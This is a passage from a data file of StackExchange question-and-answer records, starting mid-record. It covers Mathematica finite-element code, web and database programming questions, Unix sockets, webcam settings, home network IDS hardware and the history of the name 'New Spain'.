In the spirit of a top down approach to learning FEM (as discussed by @user21 at some earlier stage on this site), or in the spirit of this elegant answer https:\/\/mathematica.stackexchange.com\/a\/110210\/1089\nAnswer: Okay, here a small example for an elliptic boundary value problem.\n(I am reusing some old code over and over again, so user21 will certainly remind me again that a couple of things can be simplified... ;) )\nLet's start with my favorite region.\n<code>Needs[\"NDSolve`FEM`\"]\n(*Initialization of Finite Element Method*)\nR = ToElementMesh[\n BoundaryMeshRegion[\n Map[t \\[Function] (2 + Cos[5 t])\/3 {Cos[t], Sin[t]}, \n Most@Subdivide[0., 2. Pi, 2000]], \n Line[Partition[Range[2000], 2, 1, 1]]\n ],\n MaxCellMeasure -> 0.001,\n \"MeshOrder\" -> 1\n ];\npts = R[\"Coordinates\"];\nn = Length[pts];\nvd = NDSolve`VariableData[{\"DependentVariables\", \"Space\"} -> {{u}, {x, y}}];\nsd = NDSolve`SolutionData[{\"Space\"} -> {R}];\ncdata = InitializePDECoefficients[vd, sd,\n \"DiffusionCoefficients\" -> {{-IdentityMatrix[2]}},\n \"MassCoefficients\" -> {{1}}\n ];\nmdata = InitializePDEMethodData[vd, sd];\n\n(*Discretization*)\ndpde = DiscretizePDE[cdata, mdata, sd];\nstiffness = dpde[\"StiffnessMatrix\"];\nmass = dpde[\"MassMatrix\"];\n<\/code>\nThis supplies us with a stiffness matrix <code>stiffness<\/code> and a mass matrix <code>mass<\/code>, both assembled with repect to a basis of piecewise linear hat functions. We will need them only\nLet's choose a vertex somewhere in the middle and represent its hat function as a vector with respect to the basis function. (In the following, I put my comments into the codes so that it is easier to copy.)\n<code>i = Nearest[pts -> \"Index\", {0., 0.1}][[1]];\nhatfun = ConstantArray[0., n];\nhatfun[[i]] = 1.;\n\n(*This is how to interpolate it. *)\n\nhatfuninterpolated = ElementMeshInterpolation[{R}, hatfun];\nplot1 = Plot3D[hatfuninterpolated[x, y], {x, y} \\[Element] R, \n NormalsFunction -> None]; \/\/ AbsoluteTiming \/\/ First\n\n(*But the interpolation is actually not needed because the graph of the function can be plotted like this:*)\nscale = 2\/3;\nplot2 = Graphics3D[{\n GraphicsComplex[Join[pts, scale Partition[hatfun, 1], 2], \n Polygon[R[\"MeshElements\"][[1, 1]]]]\n }]; \/\/ AbsoluteTiming \/\/ First\n\nGraphicsRow[{plot1, plot2}, ImageSize -> Large]\n<\/code>\n\n0.251001\n0.000127\n\nNotice the difference in the timings. That's basically the reason why I say you should avoid interpolation function as much as possible.\nOkay, let's go an. We want to see how to use <code>hatfun<\/code> as the right hand side $b$ of the pde $\\Delta u = b$ in $\\varOmega$ and $u|_{\\partial \\varOmega} = f$.\n<code>(*Finding boundary and interior degrees of freedoms.*)\n\nbndplist = \n Sort@DeleteDuplicates[Flatten[R[\"BoundaryElements\"][[All, 1]]]];\nintplist = Complement[Range[n], bndplist];\n\n(*This is what DeployBoundaryConditions does to the stiffness matrix*)\n\nsystemmatrix = stiffness;\nsystemmatrix[[bndplist]] = \n IdentityMatrix[n, SparseArray, \n WorkingPrecision -> MachinePrecision][[bndplist]];\n\n(*Factorizing the system matrix.*)\n\nS = LinearSolve[systemmatrix, Method -> \"Pardiso\"];\n<\/code>\nThis is all that we have to do for the system matrix.\n<code>(*This is how the NDSolve`FEM` builds the load vector (a.k.a. the \\\nright hand side). 
*)\nload = mass.hatfun;\n\n(*f is a function that specifies the Dirichlet boundary conditions.*)\n\nf = {x, y} \\[Function] 0.0001 Sin[25 ArcTan[x, y]];\n(*This is what DeployBoundaryConditions does to the load vector*)\n\nload[[bndplist]] = f @@@ pts[[bndplist]];\n\n(*Solving the actual equation.*)\nsolution = S[load];\n\n(*Plotting via interpolation.*)\n\nsolutioninterpolated = ElementMeshInterpolation[{R}, solution];\nplot1 = Plot3D[solutioninterpolated[x, y], {x, y} \\[Element] R, \n NormalsFunction -> None, PlotRange -> All]; \/\/ \n AbsoluteTiming \/\/ First\n\n(*Fast plotting*)\nscale = 1200;\nplot2 = Graphics3D[{\n GraphicsComplex[Join[pts, scale Partition[solution, 1], 2], \n Polygon[R[\"MeshElements\"][[1, 1]]]]\n }]; \/\/ AbsoluteTiming \/\/ First\n\nGraphicsRow[{plot1, plot2}, ImageSize -> Large]\n<\/code>\n\n0.241259\n0.000119\nComment: Thanks a lot: this is exactly what I wanted :-) Here are 2 examples from your code https:\/\/www.dropbox.com\/s\/jpqs4mtesdnqf7w\/cool.png?dl=0\nComment: or identifying all basis elements : https:\/\/www.dropbox.com\/s\/m9ku7igdwyia87v\/cool2.png?dl=0\nComment: You're welcome.\n","meta":{"source":"mathematica.stackexchange","title":"Piecewise Continuous Linear Basis on a Triangular Mesh","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set lang attribute on tag in SSR mode with SvetleKit\n\nQuestion: I know user's preferred language in cookie and I am able to init locales with it (using server hook).\nAnd I would like to also render correct lang attribute which matches selected locale.\nAnswer: There are docs on specifically that.\n\nIf your content is available in multiple languages, you should set the lang attribute based on the language of the current page. You can do this with SvelteKit's handle hook:\n<code>src\/app.html<\/code>\n<code><html lang=\"%lang%\">\n<\/code>\n<code>src\/hooks.server.ts<\/code>\n<code>import type { RequestEvent, Handle } from '@sveltejs\/kit';\nexport const handle = (({ event, resolve }) => {\n return resolve(event, {\n transformPageChunk: ({ html }) =>\n html.replace('%lang%', get_lang(event))\n });\n}) satisfies Handle;\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to set lang attribute on tag in SSR mode with SvetleKit","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why was the Spanish kingdom in America called New Spain if Spain didn't exist as a country back then?\n\nQuestion: When the conquistadores arrived in America, the territory of current Spain was divided into multiple crowns\/kingdoms but it wasn't what we know today as Spain. I understand at that moment the territory was ruled by the crown of Castile and Aragon but still, each kingdom was working as an independent state.\nSo my question is why did Hernan Cortes name the territory in America \"New Spain\" if there wasn't an \"Old Spain\" to begin with?\nComment: Spain as the territory of the Iberian Peninsula was called Espanna\/Spanya\/Spania since the 12th century, as you can read in the Cr\u00f3nica de San Juan de la Pe\u00f1a and in the works of Bernat Desclot and Ramon Muntaner. And that without considering the Visigothis use of Hispania for the name of their domains.\nComment: I feel the underlying misunderstanding here is that \"regions of the world\" and \"government\" (and, relatedly, nationality) were not always as tightly linked as they are now. 
Spain as a geographical region existed long before Spain as a national country.\nComment: @CarlosMartin, not to mention it *also* being the name of the Roman province, which is an important factor in nomenclature there. In fact, across Europe there's several states that hark back to the names of Roman provinces in their names: not only Spain, but Britain and Italy as well. Not to mention (in many languages), the names of Syria, Egypt, Libya, and Palestine:\nComment: [Documenting preliminary research will improve both the probability of an answer and the quality of the answer(s)](https:\/\/history.meta.stackexchange.com\/a\/785\/26786) What's wrong with the answer in [Wikipedia](https:\/\/en.wikipedia.org\/wiki\/Spain) (referenced above by C. Martin). This is an example of an interesting historical blind spot - modern national identities obscure the complexity of pre-modern intermingling of ethnic, governmental and proto-state identities. The terms we use today \"Spain\" can have quite different meanings as we go back in time.\nComment: [Related](https:\/\/history.stackexchange.com\/q\/63698\/17887)\nComment: Was it a kingdom? Spanish Wikipedia uses the term *virreinato*\nComment: @CarlosMartin So it wasn't until later that Portugal came to be considered to not be part of \"Spain\"?\nComment: @Accumulation Yes, the independence of Portugal is actually a fascinating subject. From the 9th to the early 12th centuries it was merely a county in the Kingdom of Leon. The first Portuguese king, Alfonso I, declared his independence after some decisive victories against the Muslims in the South of his new kingdom and reconquering a lot of territory. The common explanation is that the Portuguese didn't have much help from the rest of the Spanish kingdoms in these battles so a sort of nationalistic sentiment was born\nComment: @CarlosMartin In a sense, he declared independence after [defeating his mom](https:\/\/en.wikipedia.org\/wiki\/Battle_of_S\u00e3o_Mamede) in battle in 1128. Lisbon was [conquered](https:\/\/en.wikipedia.org\/wiki\/Siege_of_Lisbon) in 1147 with the help of English Crusaders. In any case, only [around 1300](https:\/\/en.wikipedia.org\/wiki\/Denis_of_Portugal#Administration), was Portuguese considered an official language. During the succession crises around 1385 and 1580, much of the Portuguese Nobility sided with Castile. Nationalism was for the working people.\nComment: People spoke about Italy (Italia) and Germany (Germania) long before those regions became unified countries, just as we today can speak about e.g. Scandinavia despite it not being a single country...\nComment: @Julio Bastido Cortez didn't name the Spanish territories in the New World \"New Spain\", he named some of them \"New Spain\", namely lands in Mexico. Eventually The Viceroyalty of New Spain included Mexico, the US Southwest, Central America, and the Philippines. The title of the Spanish monarch for all of the New World was \"King of the Indias, the Islands and Mainland in the Ocean Sea\"..\nAnswer: 'Spain' in the sense of 'Hispania', alluding to the Roman province, certainly existed as a concept at the time, even if the Kingdom didn't (yet). Indeed, there's several medieval Kings in the Iberian peninsula who used the title 'Imperator totius Hispaniae' (ie, 'Emperor of all Spain').\nSee, for example, the epitaph of Ferdinand I of Leon, who died in 1103:\n\nH. E. TUMULATUS FERNANDUS MAGNUS REX TOTIUS HISPANIAE. FILIUS SANCTII REGIS PIRENAEORUM ET TOLOSAE. ISTA TRANSTULIT CORPORA. 
SANCTORUM IN LEGIONE BEATI ISIDORI ARCHIEPISCOPI AB HISPALI VICENTIIMARTYRIS AB ABELA. ET FECIT ECCLESIAM HANC LAPIDEAM. QUAE OLIM FUERAT LUTEA, HIC PRAELIANDO FECIT SIBI TRIBUTARIOS OMNES SARRACENOS HISPANIAE ET CEPIT COLIMBRIAM, LAMEGO, VESEO, ET ALIAS. ISTE VI CEPIT REGNA GARSIAE ET VEREMUDI. OBIIT VI K. JANUARII. ERA MCIII.\n\nTranslated:\n\nHere is buried Ferdinand the Great, king of all Spain, son of Sancho king of the Pyrenees and Toulouse. He transferred to Le\u00f3n the holy bodies of Saint Isidore archbishop, from Seville, and of Vicente martyr, from Avila, and built this church of stone, which in another time was of mud. He made his tributaries, with arms, all the Saracens of Spain. He seized Coimbra, Lamego, Viseo and other places. He took by force the kingdoms of Garcia and Vermudo. He died on December 27, (the year) 1103.\n\nAnother example, Ferdinand III of Castile, who died in 1292 and is buried in Seville's Cathedral; note how \"ESPA\u00d1A\" is already written in its modern form, not in Latin:\n\nAQVI YAZE EL MVY ONDRADO HERNANDO, SE\u00d1OR DE CASTIELLA E DE TOLEDO, E DE LEON, E DE GALICIA, DE SEVILLA, DE CORDOVA, DE MVRCIA, DE IHAEN, EL QVE CONQVISSO TODA ESPA\u00d1A, EL MAS LEAL, EL MAS VERDADERO, EL MAS FRANCO, EL MAS ESFORZADO, EL MAS APVESTO, EL MAS GRANADO, EL MAS ZOFRIDO, EL MAS HOMILDOSO, EL QVE MAS TEMIE A DIOS, EL QVE MAS LE FACIE SERVICIO, EL QVE QVEBRANTO E DESTRVYO A TODOS SVS ENEMIGOS, EL QVE ALZO, E ONDRO TODOS SVS AMIGOS, E CONQVISSO LA CIVDAD DE SEVILLA, QVE ES CABEZA DE TODA ESPA\u00d1A, E PASSO EN EL POSTRIMERO DIA DE MAYO, EN LA ERA DE MIL E CC. E NOVAENTA\n\nTranslated:\n\nHere lies the most noble Ferdinand, lord of Castile and of Toledo, and of Leon, and of Galicia, of Seville, of Cordoba, of Murcia, of Jaen, the one who conquered all Spain, the most loyal, the most true, the most frank, the most hardworking, the most handsome, the most distinguished, the most suffered, the most humble, the one who feared God most, who did Him most service, who broke and destroyed all his enemies, who raised up, and honored all his friends, and conquered the city of Seville, which is the head of all Spain, and passed on the last day of May, in the year of one thousand and two hundred and ninety.\n\nSo Spain being a concept in the 1500s shouldn't be all that surprising.\nIn exactly the same way 'Britain' (ie, Britannia), and 'Italy' were also concepts, even though a Kingdom of Great Britain wouldn't exist until 1707, and a unified Kingdom of Italy encompassing the entire peninsula wouldn't exist until 1861\/70.\nComment: \"[A] unified Kingdom of Italy encompassing the entire peninsula wouldn't exist until 1861\/70.\" -- that is not exactly true. The Ostrogothic Kingdom was called *Regnum Italiae*, and it included the whole peninsula.\nComment: Would Emperor Charles V (for whom Cortes was working) have been styled \"King of Spain\" at the time, or would he have been known to his contemporaries as King of Castile and King of Aragon distinctly? (His Wikipedia page styles him as \"King of Spain\", but I can't tell if that's an anachronism.) -- I think implicit in the question is why Cortes chose \"New Spain\" rather than, e.g., \"New Castile\".\nComment: @Riwen there also were the medieval kingdom of Italy (later part of the HRE, then defunct) and the Napoleonic kingdom of Italy, even though neither controlled the entire peninsula. The related concept did definitely exist. 
Similarly, the medieval kingdom of Germany, which just got subsumed into the HRE.\nComment: @JulioBastida they called themselves castellanos, gallegos, etc. But during the 13th-15th centuries, both Castille and Aragon annexed several other kingdoms and, for example, the King of Castille was automatically the King of Leon, the King of Navarre, the King of Galicia and several other kingdoms that had to share a king. With the marriage of the Catholic Monarchs in 1469, the kingdoms of Castille and Aragon got joined under the name of Kings of Spain. Only on paper: their grandson, Carlos I (V for most of the world) had to be recognized as King of Castille and after that, King of Aragon.\nComment: @CarlosMartin Until the first Bourbon dissolved the Cortes de Arag\u00f3n, centralized everything (like in France) and created the red-yellow flag inspired by the Aragonese Senyera to compensate the Crown of Arag\u00f3n for its loss of power.\nComment: @R.M. Charles I in Spain\nComment: @R.M. exactly my point, does it mean people back then where referring themselves as Spanish already?\nComment: @R.M.; the title 'King\/Queen of Spain' wasn't formally used until the reign of Isabel II; although Joseph Bonaparte had, briefly, used the title. Until then, the titles used were 'King\/Queen of Castile, Aragon\u2026', etc.\nComment: r.e.: Britain\/Britannia, my understanding is that is the name of the *island*, currently containing the countries of England, Scotland, and Wales, which along with Northern Ireland and a few smaller islands form the UK, etc. But the name \"Britain\" is geographical, not political. The equivalent for Spain might be Iberia (though that also includes Portugal).\nComment: @DarrelHoffman You might find [this](https:\/\/books.google.com\/ngrams\/graph?content=Iberia%2CHispania&year_start=1500&year_end=2019&corpus=en-2019&smoothing=3) interesting\nComment: @RodrigodeAzevedo Not sure how - Google ngrams simply represent *usage* over time, but not the official terminology. Just as many citizens of the UK might refer to themselves as \"British\" rather than \"English\", \"Scottish\", or \"Welsh\". Or those in the US call themselves \"Americans\" despite that being 2 whole continents and not just one country. It is interesting though that there does seem to be a small spike in \"Iberia\" at the 1500-end of the chart - shame the data doesn't go back any earlier... \"Iberia\" definitely dominates most of the timeline if you change the corpus to Spanish though.\nComment: @user22453 King Ferdinand I of Leon died in Anno Domini 1065, not 1103. 38 years later. HIs tomb gives his death year in the era of Spain or Era of the Caesars, counting the years from 38 BC. His son Alfonso VI was actually the monarch in 1103. The tomb of Ferdinand III says 1290 not 1292, and he actually died in AD 1252.\n","meta":{"source":"history.stackexchange","title":"Why was the Spanish kingdom in America called New Spain if Spain didn't exist as a country back then?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MySQL items of an order without primary key?\n\nQuestion: i have two tables in my database which belongs to each other.\nmp_order and mp_order_items.\nmp_order has the main informations of an order of a customer like adress, date etc.\n(order_id, customer_company, customer_name, customer_adress, order_date, ... 
[etc.])\nmp_order_items has the products\/items which were ordered\n(order_id, item_id, item_qty)\nBecause order_id and item_id can each repeat (though not in combination), I can't set a single column as the primary key.\nShould I implement another column as a unique identifier for the single entries, or is it valid to have a table without a primary key?\nComment: Set both order_id and item_id as primary key, eg.`Primary key(item_id, order_id)`\nAnswer: Since your requirement is that <code>order_id<\/code> and <code>item_id<\/code> cannot repeat in combination - meaning (ord_134, itm_123) can't occur twice - I believe you need to create a COMPOSITE KEY.\n<code>PRIMARY KEY(order_id, item_id)<\/code>\nBasically, a combination of both Order Id and Item Id is what will uniquely identify a record in the table.\nThere is a caveat: if you later define a FOREIGN KEY, you can't link the tables using just order_id. You will need to include all the columns that are part of the COMPOSITE KEY inside the FOREIGN KEY relation.\nAnswer: You have two options:\n\nDefine a primary key on <code>(order_id, item_id)<\/code>\nDefine a synthetic primary key, such as an auto-incremented column.\n\nI prefer the second method. It is more flexible for the future:\n\nPerhaps an order could contain the same items, but with different pricing or shipping addresses or shipping times.\nThe rows are uniquely defined with a single number, which makes it easier to find them if you need to modify rows in the future.\nThe rows are more easily referenced in another table, for instance, if you had a returns table.\n\nOf course, having a composite primary key also works and is a very viable method for implementing the logic as well.\n","meta":{"source":"stackoverflow","title":"MySQL items of an order without primary key?","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Bidirectional communication using a single UNIX socket\n\nQuestion: I have the situation where a service running in the background makes itself available for ASCII-based commands via a socket (SOCK_DGRAM) placed on the file system. I am able to successfully send commands to this interface but cannot receive any response generated by the background service. 
\nOf course, if anyone spots any misconceptions or misunderstandings in my logic please point them out.\nComment: does this help? http:\/\/stackoverflow.com\/questions\/3324619\/unix-domain-socket-using-datagram-communication-between-one-server-process-and\nComment: @Dinesh, Yep, the top answer at that link expresses basically what I thought was the cause with this. Essentially, the client *and* the server both require endpoints for proper communication - so each must have *bound* to a particular socket interface. I was asking this question to see if there was a possible method where the client does not generate this endpoint, but rather uses some kind of nameless socket that is not visibly created on the file system.\nAnswer: If the client does not bind its socket to an filesystem address, it still has a notional address assigned by the system (which may exist in the filesystem in \/tmp somewhere, or may not exist in the filesystem at all, depends on the OS). The server can get this address by using the recvfrom(2) call to receive the incoming packets from clients -- this call takes additional sockaddr * and socklen_t * arguments that it fills in with the client socket address. You then use sendto(2) to send the reply back to the client.\nComment: Is this implicit address created with a call to `sendto` or `connect`?\nComment: I realized what the problem was: the service does not have appropriate permissions to write to the address I provide it with for a response. If I explicitly specify where I want the socket file to be generated (i.e. with `bind`) then I can `chmod` and I am able to successfully receive the server's responses, but otherwise I cannot. As such, if I do not `bind` and allow the OS to create a temporary address then the permission issue is still a problem. Is there any way around this?\nComment: I thought this would be the case, but perhaps I am misusing the socket utilities. I am able to successfully send commands to the service, but by `recvfrom` blocks infinitely and never returns. I am certain the forward communicate is reaching the service because I command to shutdown behaves as expected.\nComment: If the `recvfrom` is blocking, then you're obviously not getting the commands in the server, because it is the `recvfrom` that gets to commands. If the service is getting the commands some other way then you're not using recvfrom.\nComment: I am not controlling the server listening for commands. What I mean was I am able to `sendto` my commands to the server (shutdown, for example), and the server's response is as expected (i.e. a shutdown). However, the server should respond with a status to the command; it is this response that I do not receive at the client. The server is actually a background service that I am communicating with, not anything I built or maintain.\nComment: If the server is not sending responses back to your client, there's no way to change that without modifying the server. It sounds like your server is set up to receive commands only.\nComment: I know it sends responses, I am just not getting them for some reason. When I first started working on this I was able to get it working, but refactored the code and must be neglecting a step. To clarify, I have `connect`ed to the server's socket made available on the file system. 
I then simply `send` to the server and then `recv` on the same socket.\n","meta":{"source":"stackoverflow","title":"Bidirectional communication using a single UNIX socket","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to disable automatic white balance from Webcam?\n\nQuestion: I got a webcam and I'm running some algorithm on the received images to find movements in it.\nBut, the automatic auto white balance is changing the excepted result of the pixels color variance.\nThat's why I'm trying to disable it.\nSome one knows a way to get the web can image with out this automatic color balance or disable it ?\nTks \nComment: I'm also having issues trying to disable the automatic image processing on my webcam. In lower light levels it can reduce the frame rate by up to 75% while it auto adjusts :-(\nAnswer: If you are on Linux, you can test disabling automatic white balance using the <code>uvcdynctrl<\/code> command line utility. This is not a permanent solution, since these settings are reset every time the webcam is disconnected from the computer. As of OpenCV 2.1, configuring white balance is not supported using <code>cv::VideoCapture::set()<\/code>. Assuming this is still the case in OpenCV 2.2, you will need to use another library to configure your webcam and capture frames.\nIf you on Linux, you can see an example of using direct Video4Linux (V4L) syscalls to do this in one of my Github projects.\nComment: In OpenCV 2.3 it's still not supported (http:\/\/opencv.itseez.com\/modules\/highgui\/doc\/reading_and_writing_images_and_video.html#videocapture-set)\nAnswer: In my case I found on driver two options that must be disabled, auto white exposure and auto white balance, I disable both of them and the image got as I needed. \nComment: How\/where did you disable it?\nComment: Directly on driver software.\n","meta":{"source":"stackoverflow","title":"How to disable automatic white balance from Webcam?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Power friendly home router, firewall, IDS\/IPS setup?\n\nQuestion: For those that like to manage their own firewall and run IDS\/IPS on their home networks, I'm curious - what are you using and is it power friendly?\nI used to have a shelf full systems doing various things, but moving a lot had me trim down and I'm currently just using an off the shelf home wifi router, and need something with more power. Ideally running Linux, would like to run Suricata or Snort on it, maybe in IDS mode. And with logging to a database - that could offload that to another machine.\nComment: IDS is worthwhile for anyone in IT Security, or even in IT - you can watch for odd traffic - which may help you in your day job; you are more likely to spot anomalies; and you are bound to have something sensitive on your network you want to protect.\nComment: What services are you running that you would need an IDS setup?\nAnswer: Have in the past used a MikroTik as router and firewall, and a Mini-ITX running Snort and some more intelligent filtering than the basic MikroTik box. Don't know what the total power consumption was, but they didn't even get warm.\nEasy to setup and they just work:-)\nComment: +1 for MikroTik - looks pretty good. 
Much cheaper than buying a Soekris box or a build your own VIA system.\nComment: Yeah - I hadn't heard of them until @RoryMcCune introduced me to them - Cisco-ish interface and commands, very simple to configure and quite fully featured little boxen.\nAnswer: You might want to check for Endian firewall community version, which as know is free and can be run in virtual machine.\nComment: Hi webcore - welcome to Security.SE. Once you have earned more rep you will be able to comment on other posts, but your 1st paragraph doesn't answer the question at all - the OP is not asking about mangle or the functionality so I have edited it out. For your 2nd paragraph, can you explain why running a virtual machine is power-friendly? Until you do, this doesn't answer the question.\nAnswer: Power friendly and powerful are hard to come by in cheap packages. It really depends on traffic workload. You may easily get away with some high end router (say ~$100) with OpenWRT. Check OpenWRT page for what models are supported. Get one with USB if you want to store more data on board or have a NAS handy.\nThe other option has already been mentioned - MikroTik. But that is a little bit more expensive and I have bad experience with MikroTik OS heavy customisation. It is some linux but it's highly proprietaty and there aren't many packages for it (ymmv).\nAnd then, of course, there's Turris Lite. If you're feeling hacky, you may even build one of your own. The hardware is open source and it runs OpenWRT :)\n","meta":{"source":"security.stackexchange","title":"Power friendly home router, firewall, IDS\/IPS setup?","dup_signals":{}},"subset":"stackexchange"} +{"text":"send array with socket C# winforms\n\nQuestion: how to send a array with socket like java 'outputstream'?\ncan u see any demos or example serialization ?\nI can send a simple text with socket to my client. But how can I send array, List or Class to my client. I want to send this format\nList array;\nComment: http:\/\/stackoverflow.com\/questions\/21510204\/c-sharp-tcpclient-send-serialized-objects-using-separators\nAnswer: Java's <code>outputstream<\/code> can not do what you want either, all it can do is send <code>byte[]<\/code> which is exactly what C#'s socket classes do.\nIf you want to send complex objects you must use some form of \"Serializer\" which will let you transform your objects in to a <code>byte[]<\/code> to be sent out.\nA easy to use serializer that is built in to .NET is <code>XmlSeralizer<\/code>, this will produce a string that you can then feed in to a <code>StreamWriter<\/code> which will convert the string to a <code>byte[]<\/code> and write it out on to the socket. The other end would just use the reverse process using a <code>StreamReader<\/code>.\nIf you do not want to use that intermediate text step I would NOT recomend using <code>BinaryFormatter<\/code> like you see frequently on the internet, it is very \"fragil\" and having different levels of .NET Windows updates installed on both ends can end up breaking it. 
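To make that text-based route concrete, here is a minimal sketch of the XmlSerializer-plus-StreamWriter idea described above. It is only an illustration: the <code>Payload<\/code> and <code>XmlWire<\/code> names and the <code>Stream<\/code> parameter are hypothetical stand-ins for whatever you actually pass around (e.g. the NetworkStream you get from your socket):\n<code>using System.Collections.Generic;\nusing System.IO;\nusing System.Xml.Serialization;\n\npublic class Payload\n{\n    public List<string> Items { get; set; }\n}\n\npublic static class XmlWire\n{\n    static readonly XmlSerializer Serializer = new XmlSerializer(typeof(Payload));\n\n    \/\/ sender: object -> XML text -> bytes written to the socket's stream\n    public static void Send(Stream stream, Payload payload)\n    {\n        var writer = new StreamWriter(stream);\n        Serializer.Serialize(writer, payload);\n        writer.Flush();\n    }\n\n    \/\/ receiver: bytes read from the stream -> XML text -> object\n    public static Payload Receive(Stream stream)\n    {\n        var reader = new StreamReader(stream);\n        return (Payload)Serializer.Deserialize(reader);\n    }\n}\n<\/code>\nNote that on a long-lived socket you would still need some framing (a length prefix or a delimiter) so the reader knows where one serialized object ends and the next begins; that design point applies whichever serializer you pick.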
If you do want a binary format rather than the XML route above, I recommend using a 3rd party binary serializer like Protobuf-net\nComment: **thanks** - is there a JSON parser and serializer in C#?\nComment: @jjj [Yes there is](https:\/\/msdn.microsoft.com\/en-us\/library\/bb412179(v=vs.110).aspx) however most people consider the built-in library not that great and most people usually end up using [Newtonsoft's Json.NET](http:\/\/www.newtonsoft.com\/json), it is very easy to add to your project via [NuGet](http:\/\/blogs.msdn.com\/b\/dotnet\/archive\/2013\/10\/16\/nuget-is-a-net-framework-release-vehicle.aspx) just select [Newtonsoft.Json](https:\/\/www.nuget.org\/packages\/newtonsoft.json\/) from the [package manager console](http:\/\/docs.nuget.org\/consume\/package-manager-console)\n","meta":{"source":"stackoverflow","title":"send array with socket C# winforms","dup_signals":{}},"subset":"stackexchange"}
+{"text":"@jsonRootName not working with spring boot starter hateoas\n\nQuestion: I am developing a REST application using spring-boot and spring-hateoas. The DTO that I have written is:\nBill.java\n<code>@JsonIgnoreProperties(ignoreUnknown = true)\n@JsonRootName(\"bills\")\npublic class Bill{\n<\/code>\nDependencies:\n<code>dependencies {\ncompile \"org.springframework.boot:spring-boot-starter-hateoas\"\ncompile \"org.springframework.boot:spring-boot-starter-ws\"\ncompile \"org.springframework.boot:spring-boot-starter-actuator\"\ncompile \"org.springframework.cloud:spring-cloud-starter-eureka:${springCloudVersion}\"\n\ntestCompile(\"org.springframework.boot:spring-boot-starter-test\")\n}\n<\/code>\nApplication.java:\n<code>@Configuration\n@Import(BillServiceConfig.class)\n@EnableAutoConfiguration\n@EnableEurekaClient\n@ComponentScan({\"com.billing\"})\n@EnableWebMvc\n@EnableHypermediaSupport(type = EnableHypermediaSupport.HypermediaType.HAL)\npublic class Application {\n<\/code>\nBillController.java:\n<code> @RequestMapping(method = RequestMethod.GET, value = \"\")\n public ResponseEntity<Resources<Resource<Bill>>> getBills(@PathVariable String billUid)\n<\/code>\nAnd the spring-boot version I am using is 1.2.2. The output that I am getting is\n<code>`_embedded: {\nBillList:\n{`\n<\/code>\nThe JSON root name here is BillList, but I need it to be \"bills\" instead of \"BillList\". Can anybody help out with this issue? Thanks in advance.\nAnswer: The keys within an <code>_embedded<\/code> clause are actually relation names. Hence, they're obtained through a <code>RelProvider<\/code> abstraction in Spring HATEOAS. The easiest way to customize them is by annotating the domain type with <code>@Relation<\/code> and defining the relation names that you expect for item and collection relations.\nAn easy way to get correct plurals used in the <code>_embedded<\/code> clause is by adding the Evo Inflector JAR to your classpath as documented here.\nComment: I'm looking for an example of how to use the `@Relation` annotation and the Evo Inflector JAR to get the `_embedded` clause set up correctly in my response. Do you know of any examples that show how to do this?\n","meta":{"source":"stackoverflow","title":"@jsonRootName not working with spring boot starter hateoas","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Jquery .load - get featured products (opencart) from index.php to index.html same domain\n\nQuestion: javascript is definitely not one of my strong points and normally I get by quite well. 
however.\nwhat i have is (for purpose of information) site http:\/\/mystore.co.uk which by default will lead you to index.html as the home page.\nI then have index.php which is my opencart store.\non index.php i have a featured products module installed and what I wish to do is take that entire div and place it onto my index.html page. \nWhat is the javascript .load function script that I need to use to do this. I have been looking for an answer but I think I have propably overlooked it several times due to frustration and confusion. any help you can offer would be appreciated.\nThanks in advance. \nComment: have you tried using a hidden iframe?\nComment: I havn't is the simple answer\nComment: You could also create a hidden div, and use jQuery.load() function to load the data into there, and then use a selector to pull out the div.\nComment: Just to clarify - these two pages are on the same domain. so there is no need for curl.php as far as I am aware.\n\nIf you could be kind enough to write out the code I would need to use for that, it would be a great help\nComment: Ok, thats good, but you can do this all client side. Try the ajax first. The solution I provided above with the hidden div\nComment: Try my solution below. I think you should be good.\nComment: @AlexShilman: If there is a problem with a post, please describe the problem in detail, instead of just posting \"what have you tried\". See [this Meta post](http:\/\/meta.stackexchange.com\/a\/172760\/152134) on whether \"what have you tried\" comments are acceptable and alternatives to \"what have you tried\". Thanks!\nAnswer: Give this a try, Assuming #yourhiddenDiv is in index.html and #yourdiv is the one you want to fetch from index.php, and both files are on the same domain:\n<code>$('#yourhiddenDiv').load('index.php #yourdiv').hide().fadeIn('slow');\n<\/code>\nComment: they are the same domain yes. and this has helped immensly - thank you\n","meta":{"source":"stackoverflow","title":"Jquery .load - get featured products (opencart) from index.php to index.html same domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"I am getting an error 1055 trying to group after a join\n\nQuestion: I am new to SQL and I am having trouble with finding out how to group after a join. The goal is to find out what country raised the most.\n<code>SELECT x.country_id\n , x.pledged\n , y.id\n , y.name \n FROM campaign x\n LEFT \n JOIN country y\n ON x.country_id = y.id\n<\/code>\nThis brings up the columns required and it's all fine\nWhen I add:\n<code>GROUP BY country.name\n<\/code>\nor\n<code>GROUP BY campaign.country_id\n<\/code>\nI get an error that I don't understand.\n\nError Code: 1055. Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'kickstarter.campaign.country_id' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by\nComment: This is a faq. Please before considering posting read your textbook and\/or manual & google any error message or many clear, concise & precise phrasings of your question\/problem\/goal, with & without your particular strings\/names & site:stackoverflow.com & tags; read many answers. If you post a question, use one phrasing as title. Reflect your research. See [ask] & the voting arrow mouseover texts.\nAnswer: The basic rule for \"group by\" is that the column that has been selected has to either be applied with aggregated function or it has shown up after the group by. 
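(To illustrate the rule with a made-up table <code>t(grp, val)<\/code>: under <code>only_full_group_by<\/code>, <code>SELECT grp, val FROM t GROUP BY grp<\/code> is rejected because <code>val<\/code> is neither grouped nor aggregated, while <code>SELECT grp, SUM(val) FROM t GROUP BY grp<\/code> is accepted.)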
